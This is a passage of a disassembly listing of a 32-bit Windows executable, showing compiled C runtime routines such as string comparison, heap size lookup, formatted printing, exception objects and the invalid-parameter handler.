arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		push	[ebp+arg_8]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		xor	ebx, ebx
		cmp	[ebp+arg_0], ebx
		jnz	short loc_402DAB
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_402DA1
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_402DA1:				; CODE XREF: sub_402D64+34j
		mov	eax, 7FFFFFFFh
		jmp	loc_402E34
; ---------------------------------------------------------------------------

loc_402DAB:				; CODE XREF: sub_402D64+17j
		push	edi
		mov	edi, [ebp+arg_4]
		cmp	edi, ebx
		jnz	short loc_402DDE
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_402DD7
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_402DD7:				; CODE XREF: sub_402D64+6Aj
		mov	eax, 7FFFFFFFh
		jmp	short loc_402E33
; ---------------------------------------------------------------------------

loc_402DDE:				; CODE XREF: sub_402D64+4Dj
		mov	eax, [ebp+var_10]
		cmp	[eax+14h], ebx
		jnz	short loc_402DF3
		push	edi
		push	[ebp+arg_0]
		call	sub_402D2F
		pop	ecx
		pop	ecx
		jmp	short loc_402E27
; ---------------------------------------------------------------------------

loc_402DF3:				; CODE XREF: sub_402D64+80j
		push	esi

loc_402DF4:				; CODE XREF: sub_402D64+BCj
		mov	eax, [ebp+arg_0]
		movzx	eax, byte ptr [eax]
		lea	ecx, [ebp+var_10]
		push	ecx
		push	eax
		call	sub_405C1A
		inc	[ebp+arg_0]
		mov	esi, eax
		movzx	eax, byte ptr [edi]
		lea	ecx, [ebp+var_10]
		push	ecx
		push	eax
		call	sub_405C1A
		add	esp, 10h
		inc	edi
		cmp	esi, ebx
		jz	short loc_402E22
		cmp	esi, eax
		jz	short loc_402DF4

loc_402E22:				; CODE XREF: sub_402D64+B8j
		sub	esi, eax
		mov	eax, esi
		pop	esi

loc_402E27:				; CODE XREF: sub_402D64+8Dj
		cmp	[ebp+var_4], bl
		jz	short loc_402E33
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

loc_402E33:				; CODE XREF: sub_402D64+78j
					; sub_402D64+C6j
		pop	edi

loc_402E34:				; CODE XREF: sub_402D64+42j
		pop	ebx
		leave
		retn
sub_402D64	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402E37	proc near		; CODE XREF: sub_4182F6+34p
					; sub_4182F6+45p ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	esi
		xor	esi, esi
		cmp	dword_428140, esi
		jnz	short loc_402E75
		cmp	[ebp+arg_0], esi
		jnz	short loc_402E69

loc_402E4A:				; CODE XREF: sub_402E37+35j
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		mov	eax, 7FFFFFFFh
		jmp	short loc_402E84
; ---------------------------------------------------------------------------

loc_402E69:				; CODE XREF: sub_402E37+11j
		cmp	[ebp+arg_4], esi
		jz	short loc_402E4A
		pop	esi
		pop	ebp
		jmp	sub_402D2F
; ---------------------------------------------------------------------------

loc_402E75:				; CODE XREF: sub_402E37+Cj
		push	esi
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_402D64
		add	esp, 0Ch

loc_402E84:				; CODE XREF: sub_402E37+30j
		pop	esi
		pop	ebp
		retn
sub_402E37	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402E87	proc near		; CODE XREF: sub_402F77+51p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		xor	ebx, ebx
		cmp	[ebp+arg_8], ebx
		push	esi
		push	edi
		jz	loc_402F70
		push	[ebp+arg_C]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		cmp	[ebp+arg_0], ebx
		jnz	short loc_402ED9

loc_402EAB:				; CODE XREF: sub_402E87+57j
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_402ECF
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_402ECF:				; CODE XREF: sub_402E87+3Fj
		mov	eax, 7FFFFFFFh
		jmp	loc_402F72
; ---------------------------------------------------------------------------

loc_402ED9:				; CODE XREF: sub_402E87+22j
		mov	edi, [ebp+arg_4]
		cmp	edi, ebx
		jz	short loc_402EAB
		mov	esi, 7FFFFFFFh
		cmp	[ebp+arg_8], esi
		jbe	short loc_402F12
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_402F0E
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_402F0E:				; CODE XREF: sub_402E87+7Ej
		mov	eax, esi
		jmp	short loc_402F72
; ---------------------------------------------------------------------------

loc_402F12:				; CODE XREF: sub_402E87+61j
		mov	eax, [ebp+var_10]
		cmp	[eax+14h], ebx
		jnz	short loc_402F37
		push	[ebp+arg_8]
		push	edi
		push	[ebp+arg_0]
		call	sub_405DE0
		add	esp, 0Ch

loc_402F29:				; CODE XREF: sub_402E87+E7j
		cmp	[ebp+var_4], bl
		jz	short loc_402F72
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	short loc_402F72
; ---------------------------------------------------------------------------

loc_402F37:				; CODE XREF: sub_402E87+91j
					; sub_402E87+E1j
		mov	eax, [ebp+arg_0]
		movzx	eax, byte ptr [eax]
		lea	ecx, [ebp+var_10]
		push	ecx
		push	eax
		call	sub_405C1A
		inc	[ebp+arg_0]
		mov	esi, eax
		movzx	eax, byte ptr [edi]
		lea	ecx, [ebp+var_10]
		push	ecx
		push	eax
		call	sub_405C1A
		add	esp, 10h
		inc	edi
		dec	[ebp+arg_8]
		jz	short loc_402F6A
		cmp	esi, ebx
		jz	short loc_402F6A
		cmp	esi, eax
		jz	short loc_402F37

loc_402F6A:				; CODE XREF: sub_402E87+D9j
					; sub_402E87+DDj
		sub	esi, eax
		mov	eax, esi
		jmp	short loc_402F29
; ---------------------------------------------------------------------------

loc_402F70:				; CODE XREF: sub_402E87+Ej
		xor	eax, eax

loc_402F72:				; CODE XREF: sub_402E87+4Dj
					; sub_402E87+89j ...
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_402E87	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402F77	proc near		; CODE XREF: sub_41A70B+D3p
					; sub_41A8D9+176p ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	esi
		xor	esi, esi
		cmp	dword_428140, esi
		jnz	short loc_402FBE
		cmp	[ebp+arg_0], esi
		jnz	short loc_402FA9

loc_402F8A:				; CODE XREF: sub_402F77+35j
					; sub_402F77+3Ej
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		mov	eax, 7FFFFFFFh
		jmp	short loc_402FD0
; ---------------------------------------------------------------------------

loc_402FA9:				; CODE XREF: sub_402F77+11j
		cmp	[ebp+arg_4], esi
		jz	short loc_402F8A
		cmp	[ebp+arg_8], 7FFFFFFFh
		ja	short loc_402F8A
		pop	esi
		pop	ebp
		jmp	sub_405DE0
; ---------------------------------------------------------------------------

loc_402FBE:				; CODE XREF: sub_402F77+Cj
		push	esi
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_402E87
		add	esp, 10h

loc_402FD0:				; CODE XREF: sub_402F77+30j
		pop	esi
		pop	ebp
		retn
sub_402F77	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402FD3	proc near		; CODE XREF: sub_401C1D+1Ep
					; sub_401C1D+40p ...

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	10h
		push	offset dword_422878
		call	__SEH_prolog4
		xor	eax, eax
		mov	ebx, [ebp+arg_0]
		xor	edi, edi
		cmp	ebx, edi
		setnz	al
		cmp	eax, edi
		jnz	short loc_40300C
		call	sub_405D93
		mov	dword ptr [eax], 16h
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_40305F
; ---------------------------------------------------------------------------

loc_40300C:				; CODE XREF: sub_402FD3+1Aj
		cmp	dword_438854, 3
		jnz	short loc_40304D
		push	4
		call	sub_405FB7
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		push	ebx
		call	sub_4060E5
		pop	ecx
		mov	[ebp+var_20], eax
		cmp	eax, edi
		jz	short loc_403039
		mov	esi, [ebx-4]
		sub	esi, 9
		mov	[ebp+var_1C], esi
		jmp	short loc_40303C
; ---------------------------------------------------------------------------

loc_403039:				; CODE XREF: sub_402FD3+59j
		mov	esi, [ebp+var_1C]

loc_40303C:				; CODE XREF: sub_402FD3+64j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40306D
		cmp	[ebp+var_20], edi
		jnz	short loc_40305D

loc_40304D:				; CODE XREF: sub_402FD3+40j
		push	ebx
		push	edi
		push	dword_4282C8
		call	ds:dword_41E190	; RtlSizeHeap
		mov	esi, eax

loc_40305D:				; CODE XREF: sub_402FD3+78j
		mov	eax, esi

loc_40305F:				; CODE XREF: sub_402FD3+37j
		call	__SEH_epilog4
		retn
sub_402FD3	endp


; =============== S U B	R O U T	I N E =======================================



sub_403065	proc near		; DATA XREF: jlrllt49:00422890o
		xor	edi, edi
		mov	ebx, [ebp+8]
		mov	esi, [ebp-1Ch]
sub_403065	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40306D	proc near		; CODE XREF: sub_402FD3+70p
		push	4
		call	sub_405EDF
		pop	ecx
		retn
sub_40306D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_403076	proc near		; CODE XREF: sub_41AB0C+54p
		jmp	ds:dword_41E194
sub_403076	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40307C	proc near		; CODE XREF: sub_40177B+FEp
					; sub_40177B+12Fp ...

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= byte ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		push	ebx
		xor	ebx, ebx
		cmp	[ebp+arg_8], ebx
		jnz	short loc_4030A7
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_403126
; ---------------------------------------------------------------------------

loc_4030A7:				; CODE XREF: sub_40307C+Cj
		mov	ecx, [ebp+arg_4]
		cmp	ecx, ebx
		push	esi
		mov	esi, [ebp+arg_0]
		jz	short loc_4030D3
		cmp	esi, ebx
		jnz	short loc_4030D3
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_403125
; ---------------------------------------------------------------------------

loc_4030D3:				; CODE XREF: sub_40307C+34j
					; sub_40307C+38j
		mov	eax, 7FFFFFFFh
		cmp	ecx, eax
		mov	[ebp+var_1C], eax
		ja	short loc_4030E2
		mov	[ebp+var_1C], ecx

loc_4030E2:				; CODE XREF: sub_40307C+61j
		push	edi
		lea	eax, [ebp+arg_C]
		push	eax
		push	ebx
		push	[ebp+arg_8]
		lea	eax, [ebp+var_20]
		push	eax
		mov	[ebp+var_14], 42h
		mov	[ebp+var_18], esi
		mov	[ebp+var_20], esi
		call	sub_406F97
		add	esp, 10h
		cmp	esi, ebx
		mov	edi, eax
		jz	short loc_403124
		dec	[ebp+var_1C]
		js	short loc_403116
		mov	eax, [ebp+var_20]
		mov	[eax], bl
		jmp	short loc_403122
; ---------------------------------------------------------------------------

loc_403116:				; CODE XREF: sub_40307C+91j
		lea	eax, [ebp+var_20]
		push	eax
		push	ebx
		call	sub_406D96
		pop	ecx
		pop	ecx

loc_403122:				; CODE XREF: sub_40307C+98j
		mov	eax, edi

loc_403124:				; CODE XREF: sub_40307C+8Cj
		pop	edi

loc_403125:				; CODE XREF: sub_40307C+55j
		pop	esi

loc_403126:				; CODE XREF: sub_40307C+29j
		pop	ebx
		leave
		retn
sub_40307C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_403129	proc near		; CODE XREF: sub_401C1D+CFp
					; sub_417C06+15Fp ...
		jmp	sub_4034FB
sub_403129	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40312E	proc near		; CODE XREF: sub_40101C+Fp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_C]
		push	esi
		push	edi
		xor	edi, edi
		cmp	eax, edi
		jz	short loc_403183
		cmp	[ebp+arg_0], edi
		jnz	short loc_40315C

loc_403141:				; CODE XREF: sub_40312E+31j
		call	sub_405D93
		push	16h
		pop	esi
		mov	[eax], esi

loc_40314B:				; CODE XREF: sub_40312E+44j
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_403185
; ---------------------------------------------------------------------------

loc_40315C:				; CODE XREF: sub_40312E+11j
		cmp	[ebp+arg_8], edi
		jz	short loc_403141
		cmp	[ebp+arg_4], eax
		jnb	short loc_403174
		call	sub_405D93
		push	22h
		pop	ecx
		mov	[eax], ecx
		mov	esi, ecx
		jmp	short loc_40314B
; ---------------------------------------------------------------------------

loc_403174:				; CODE XREF: sub_40312E+36j
		push	eax
		push	[ebp+arg_8]
		push	[ebp+arg_0]
		call	sub_407930
		add	esp, 0Ch

loc_403183:				; CODE XREF: sub_40312E+Cj
		xor	eax, eax

loc_403185:				; CODE XREF: sub_40312E+2Cj
		pop	edi
		pop	esi
		pop	ebp
		retn
sub_40312E	endp


; =============== S U B	R O U T	I N E =======================================



sub_403189	proc near		; CODE XREF: sub_401065+11p
		mov	eax, ecx
		and	dword ptr [eax+4], 0
		and	dword ptr [eax+8], 0
		mov	dword ptr [eax], offset	off_41E38C
		retn
sub_403189	endp


; =============== S U B	R O U T	I N E =======================================



sub_40319A	proc near		; CODE XREF: sub_4015ED+2Fp
					; sub_40BFC7+15Dp

arg_0		= dword	ptr  4

		push	ebx
		mov	ebx, [esp+4+arg_0]
		push	esi
		push	edi
		mov	edi, ecx
		mov	dword ptr [edi], offset	off_41E38C
		mov	eax, [ebx]
		test	eax, eax
		jz	short loc_4031D5
		push	eax
		call	sub_4046F0
		mov	esi, eax
		inc	esi
		push	esi
		call	sub_403C6E
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	[edi+4], eax
		jz	short loc_4031D9
		push	dword ptr [ebx]
		push	esi
		push	eax
		call	sub_407C95
		add	esp, 0Ch
		jmp	short loc_4031D9
; ---------------------------------------------------------------------------

loc_4031D5:				; CODE XREF: sub_40319A+13j
		and	dword ptr [edi+4], 0

loc_4031D9:				; CODE XREF: sub_40319A+2Bj
					; sub_40319A+39j
		mov	dword ptr [edi+8], 1
		mov	eax, edi
		pop	edi
		pop	esi
		pop	ebx
		retn	4
sub_40319A	endp


; =============== S U B	R O U T	I N E =======================================



sub_4031E8	proc near		; CODE XREF: sub_4035C0+Ap

arg_0		= dword	ptr  4

		mov	eax, ecx
		mov	ecx, [esp+arg_0]
		mov	dword ptr [eax], offset	off_41E38C
		mov	ecx, [ecx]
		and	dword ptr [eax+8], 0
		mov	[eax+4], ecx
		retn	8
sub_4031E8	endp


; =============== S U B	R O U T	I N E =======================================



sub_403200	proc near		; CODE XREF: sub_4013E6+15p
					; sub_4015ED+51p ...

arg_0		= dword	ptr  4

		push	ebx
		mov	ebx, [esp+4+arg_0]
		push	esi
		mov	esi, ecx
		mov	dword ptr [esi], offset	off_41E38C
		mov	eax, [ebx+8]
		mov	[esi+8], eax
		test	eax, eax
		mov	eax, [ebx+4]
		push	edi
		jz	short loc_40324D
		test	eax, eax
		jz	short loc_403247
		push	eax
		call	sub_4046F0
		mov	edi, eax
		inc	edi
		push	edi
		call	sub_403C6E
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	[esi+4], eax
		jz	short loc_403250
		push	dword ptr [ebx+4]
		push	edi
		push	eax
		call	sub_407C95
		add	esp, 0Ch
		jmp	short loc_403250
; ---------------------------------------------------------------------------

loc_403247:				; CODE XREF: sub_403200+1Ej
		and	dword ptr [esi+4], 0
		jmp	short loc_403250
; ---------------------------------------------------------------------------

loc_40324D:				; CODE XREF: sub_403200+1Aj
		mov	[esi+4], eax

loc_403250:				; CODE XREF: sub_403200+36j
					; sub_403200+45j ...
		pop	edi
		mov	eax, esi
		pop	esi
		pop	ebx
		retn	4
sub_403200	endp


; =============== S U B	R O U T	I N E =======================================



sub_403258	proc near		; CODE XREF: sub_401038+6j
					; .text:0040104Cp ...
		cmp	dword ptr [ecx+8], 0
		mov	dword ptr [ecx], offset	off_41E38C
		jz	short locret_40326D
		push	dword ptr [ecx+4]
		call	sub_403B91
		pop	ecx

locret_40326D:				; CODE XREF: sub_403258+Aj
		retn
sub_403258	endp


; =============== S U B	R O U T	I N E =======================================



sub_40326E	proc near		; DATA XREF: jlrllt49:0041E338o
					; jlrllt49:0041E390o ...
		mov	eax, [ecx+4]
		test	eax, eax
		jnz	short locret_40327A
		mov	eax, offset aUnknownExcepti ; "Unknown exception"

locret_40327A:				; CODE XREF: sub_40326E+5j
		retn
sub_40326E	endp

; ---------------------------------------------------------------------------

loc_40327B:				; DATA XREF: jlrllt49:off_41E38Co
		push	esi
		mov	esi, ecx
		call	sub_403258
		test	byte ptr [esp+8], 1
		jz	short loc_403291
		push	esi
		call	sub_4034FB
		pop	ecx

loc_403291:				; CODE XREF: .text:00403288j
		mov	eax, esi
		pop	esi
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_403297	proc near		; CODE XREF: sub_403373+18p

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

		push	ecx
		push	ebx
		push	ebp
		push	esi
		push	edi
		push	dword_438830
		call	sub_405753
		push	dword_43882C
		mov	esi, eax
		mov	[esp+1Ch+var_4], esi
		call	sub_405753
		mov	edi, eax
		cmp	edi, esi
		pop	ecx
		pop	ecx
		jb	short loc_40333C
		mov	ebx, edi
		sub	ebx, esi
		lea	ebp, [ebx+4]
		cmp	ebp, 4
		jb	short loc_40333C
		push	esi
		call	sub_402FD3
		mov	esi, eax
		cmp	esi, ebp
		pop	ecx
		jnb	short loc_403323
		mov	eax, 800h
		cmp	esi, eax
		jnb	short loc_4032E4
		mov	eax, esi

loc_4032E4:				; CODE XREF: sub_403297+49j
		add	eax, esi
		cmp	eax, esi
		jb	short loc_4032FA
		push	eax
		push	[esp+18h+var_4]
		call	sub_407D82
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_403311

loc_4032FA:				; CODE XREF: sub_403297+51j
		lea	eax, [esi+10h]
		cmp	eax, esi
		jb	short loc_40333C
		push	eax
		push	[esp+18h+var_4]
		call	sub_407D82
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_40333C

loc_403311:				; CODE XREF: sub_403297+61j
		sar	ebx, 2
		push	eax
		lea	edi, [eax+ebx*4]
		call	sub_4056E7
		pop	ecx
		mov	dword_438830, eax

loc_403323:				; CODE XREF: sub_403297+40j
		mov	esi, [esp+14h+arg_0]
		mov	[edi], esi
		add	edi, 4
		push	edi
		call	sub_4056E7
		mov	dword_43882C, eax
		pop	ecx
		mov	eax, esi
		jmp	short loc_40333E
; ---------------------------------------------------------------------------

loc_40333C:				; CODE XREF: sub_403297+27j
					; sub_403297+33j ...
		xor	eax, eax

loc_40333E:				; CODE XREF: sub_403297+A3j
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		pop	ecx
		retn
sub_403297	endp


; =============== S U B	R O U T	I N E =======================================



sub_403344	proc near		; DATA XREF: jlrllt49:0041E2E0o
		push	esi
		push	4
		push	20h
		call	sub_407D3A
		mov	esi, eax
		push	esi
		call	sub_4056E7
		add	esp, 0Ch
		test	esi, esi
		mov	dword_438830, eax
		mov	dword_43882C, eax
		jnz	short loc_40336C
		push	18h
		pop	eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40336C:				; CODE XREF: sub_403344+21j
		and	dword ptr [esi], 0
		xor	eax, eax
		pop	esi
		retn
sub_403344	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403373	proc near		; CODE XREF: sub_4033AF+4p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	0Ch
		push	offset dword_422898
		call	__SEH_prolog4
		call	sub_407E7C
		and	[ebp+ms_exc.disabled], 0
		push	[ebp+arg_0]
		call	sub_403297
		pop	ecx
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_4033A9
		mov	eax, [ebp+var_1C]
		call	__SEH_epilog4
		retn
sub_403373	endp


; =============== S U B	R O U T	I N E =======================================



sub_4033A9	proc near		; CODE XREF: sub_403373+28p
					; DATA XREF: jlrllt49:004228B0o
		call	sub_407E85
		retn
sub_4033A9	endp


; =============== S U B	R O U T	I N E =======================================



sub_4033AF	proc near		; CODE XREF: sub_4035D9+45p
					; sub_407F39+44p ...

arg_0		= dword	ptr  4

		push	[esp+arg_0]
		call	sub_403373
		neg	eax
		sbb	eax, eax
		neg	eax
		pop	ecx
		dec	eax
		retn
sub_4033AF	endp


; =============== S U B	R O U T	I N E =======================================



sub_4033C1	proc near		; CODE XREF: sub_4080D9+15p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	dword_427DE0, eax
		retn
sub_4033C1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=2A8h


sub_4033CB	proc near		; CODE XREF: sub_4034C7+1Fj
					; sub_405FE8+21p ...

var_328		= dword	ptr -328h
var_31C		= dword	ptr -31Ch
var_2D8		= dword	ptr -2D8h
var_2D4		= dword	ptr -2D4h
var_2D0		= dword	ptr -2D0h
var_244		= word ptr -244h
var_240		= word ptr -240h
var_23C		= word ptr -23Ch
var_238		= word ptr -238h
var_234		= dword	ptr -234h
var_230		= dword	ptr -230h
var_22C		= dword	ptr -22Ch
var_228		= dword	ptr -228h
var_224		= dword	ptr -224h
var_220		= dword	ptr -220h
var_21C		= dword	ptr -21Ch
var_218		= dword	ptr -218h
var_214		= word ptr -214h
var_210		= dword	ptr -210h
var_20C		= dword	ptr -20Ch
var_208		= word ptr -208h
var_4		= dword	ptr -4

		push	ebp
		lea	ebp, [esp-2A8h]
		sub	esp, 328h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+2A8h+var_4], eax
		push	esi
		mov	[ebp+2A8h+var_220], eax
		mov	[ebp+2A8h+var_224], ecx
		mov	[ebp+2A8h+var_228], edx
		mov	[ebp+2A8h+var_22C], ebx
		mov	[ebp+2A8h+var_230], esi
		mov	[ebp+2A8h+var_234], edi
		mov	[ebp+2A8h+var_208], ss
		mov	[ebp+2A8h+var_214], cs
		mov	[ebp+2A8h+var_238], ds
		mov	[ebp+2A8h+var_23C], es
		mov	[ebp+2A8h+var_240], fs
		mov	[ebp+2A8h+var_244], gs
		pushf
		pop	[ebp+2A8h+var_210]
		mov	esi, [ebp+2ACh]
		lea	eax, [ebp+2ACh]
		mov	[ebp+2A8h+var_20C], eax
		mov	[ebp+2A8h+var_2D0], 10001h
		mov	[ebp+2A8h+var_218], esi
		mov	eax, [eax-4]
		push	50h
		mov	[ebp+2A8h+var_21C], eax
		lea	eax, [ebp+2A8h+var_328]
		push	0
		push	eax
		call	sub_408130
		lea	eax, [ebp+2A8h+var_328]
		mov	[ebp+2A8h+var_2D8], eax
		lea	eax, [ebp+2A8h+var_2D0]
		add	esp, 0Ch
		mov	[ebp+2A8h+var_328], 0C000000Dh
		mov	[ebp+2A8h+var_31C], esi
		mov	[ebp+2A8h+var_2D4], eax
		call	ds:off_41E08C
		push	0
		mov	esi, eax
		call	ds:dword_41E19C	; SetUnhandledExceptionFilter
		lea	eax, [ebp+2A8h+var_2D8]
		push	eax
		call	ds:off_41E198
		test	eax, eax
		jnz	short loc_40349F
		test	esi, esi
		jnz	short loc_40349F
		push	2
		call	sub_408125
		pop	ecx

loc_40349F:				; CODE XREF: sub_4033CB+C6j
					; sub_4033CB+CAj
		push	0C000000Dh
		call	ds:dword_41E0C8	; GetCurrentProcess
		push	eax
		call	ds:off_41E0F4
		mov	ecx, [ebp+2A8h+var_4]
		xor	ecx, ebp
		pop	esi
		call	sub_402C9E
		add	ebp, 2A8h
		leave
		retn
sub_4033CB	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4034C7	proc near		; CODE XREF: sub_402D64+29p
					; sub_402D64+5Fp ...
		push	ebp
		mov	ebp, esp
		push	dword_427DE0
		call	sub_405753
		test	eax, eax
		pop	ecx
		jz	short loc_4034DD
		pop	ebp
		jmp	eax
; ---------------------------------------------------------------------------

loc_4034DD:				; CODE XREF: sub_4034C7+11j
		push	2
		call	sub_408125
		pop	ecx
		pop	ebp
		jmp	sub_4033CB
sub_4034C7	endp


; =============== S U B	R O U T	I N E =======================================



sub_4034EB	proc near		; CODE XREF: sub_40164F+5p
					; sub_40164F+14p ...
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		call	sub_4034C7
		add	esp, 14h
		retn
sub_4034EB	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_4034FB	proc near		; CODE XREF: .text:00401059p
					; .text:004010D5p ...
		jmp	sub_403B91
sub_4034FB	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403500	proc near		; CODE XREF: sub_401000+Fp
					; sub_4040B2+84p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	esi
		mov	esi, [ebp+arg_C]
		push	edi
		xor	edi, edi
		cmp	esi, edi
		jnz	short loc_403512

loc_40350E:				; CODE XREF: sub_403500+4Bj
		xor	eax, eax
		jmp	short loc_403577
; ---------------------------------------------------------------------------

loc_403512:				; CODE XREF: sub_403500+Cj
		cmp	[ebp+arg_0], edi
		jnz	short loc_403532

loc_403517:				; CODE XREF: sub_403500+5Fj
		call	sub_405D93
		push	16h
		pop	esi
		mov	[eax], esi

loc_403521:				; CODE XREF: sub_403500+72j
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_403577
; ---------------------------------------------------------------------------

loc_403532:				; CODE XREF: sub_403500+15j
		cmp	[ebp+arg_8], edi
		jz	short loc_40354D
		cmp	[ebp+arg_4], esi
		jb	short loc_40354D
		push	esi
		push	[ebp+arg_8]
		push	[ebp+arg_0]
		call	sub_4081B0
		add	esp, 0Ch
		jmp	short loc_40350E
; ---------------------------------------------------------------------------

loc_40354D:				; CODE XREF: sub_403500+35j
					; sub_403500+3Aj
		push	[ebp+arg_4]
		push	edi
		push	[ebp+arg_0]
		call	sub_408130
		add	esp, 0Ch
		cmp	[ebp+arg_8], edi
		jz	short loc_403517
		cmp	[ebp+arg_4], esi
		jnb	short loc_403574
		call	sub_405D93
		push	22h
		pop	ecx
		mov	[eax], ecx
		mov	esi, ecx
		jmp	short loc_403521
; ---------------------------------------------------------------------------

loc_403574:				; CODE XREF: sub_403500+64j
		push	16h
		pop	eax

loc_403577:				; CODE XREF: sub_403500+10j
					; sub_403500+30j
		pop	edi
		pop	esi
		pop	ebp
		retn
sub_403500	endp


; =============== S U B	R O U T	I N E =======================================



sub_40357B	proc near		; CODE XREF: .text:0040358Cp
		push	ecx
		mov	dword ptr [ecx], offset	off_41E3AC
		call	sub_408515
		pop	ecx
		retn
sub_40357B	endp

; ---------------------------------------------------------------------------

loc_403589:				; DATA XREF: jlrllt49:off_41E3ACo
		push	esi
		mov	esi, ecx
		call	sub_40357B
		test	byte ptr [esp+8], 1
		jz	short loc_40359F
		push	esi
		call	sub_4034FB
		pop	ecx

loc_40359F:				; CODE XREF: .text:00403596j
		mov	eax, esi
		pop	esi
